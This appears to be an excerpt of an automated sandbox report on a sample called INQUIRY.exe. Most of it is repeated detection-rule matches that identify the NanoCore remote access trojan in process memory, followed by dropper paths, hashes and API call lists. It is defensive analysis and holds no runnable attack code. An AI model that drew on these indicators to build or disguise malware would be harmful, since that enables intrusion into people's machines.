Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		1_2_00403225
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		5_2_00403225

Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_0040604C	1_2_0040604C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_00404772	1_2_00404772
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_021A0B88	1_2_021A0B88
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_0040A2A5	4_2_0040A2A5
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_02553850	4_2_02553850
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_025523A0	4_2_025523A0
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_02552FA8	4_2_02552FA8
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_0255306F	4_2_0255306F
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_0040A2A5	4_1_0040A2A5
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_0040604C	5_2_0040604C
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_00404772	5_2_00404772
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_0040A2A5	6_2_0040A2A5
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_00AB0700	6_2_00AB0700
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_049E2FA8	6_2_049E2FA8
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_049E23A0	6_2_049E23A0
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_049E306F	6_2_049E306F
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_0040A2A5	6_1_0040A2A5

Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: String function: 00401ED0 appears 92 times
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: String function: 004056B5 appears 32 times
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: String function: 0040569E appears 72 times

Source: INQUIRY.exe, 00000001.00000003.654638153.00000000034CF000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
Source: INQUIRY.exe, 00000001.00000003.658531644.0000000003336000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY.exe
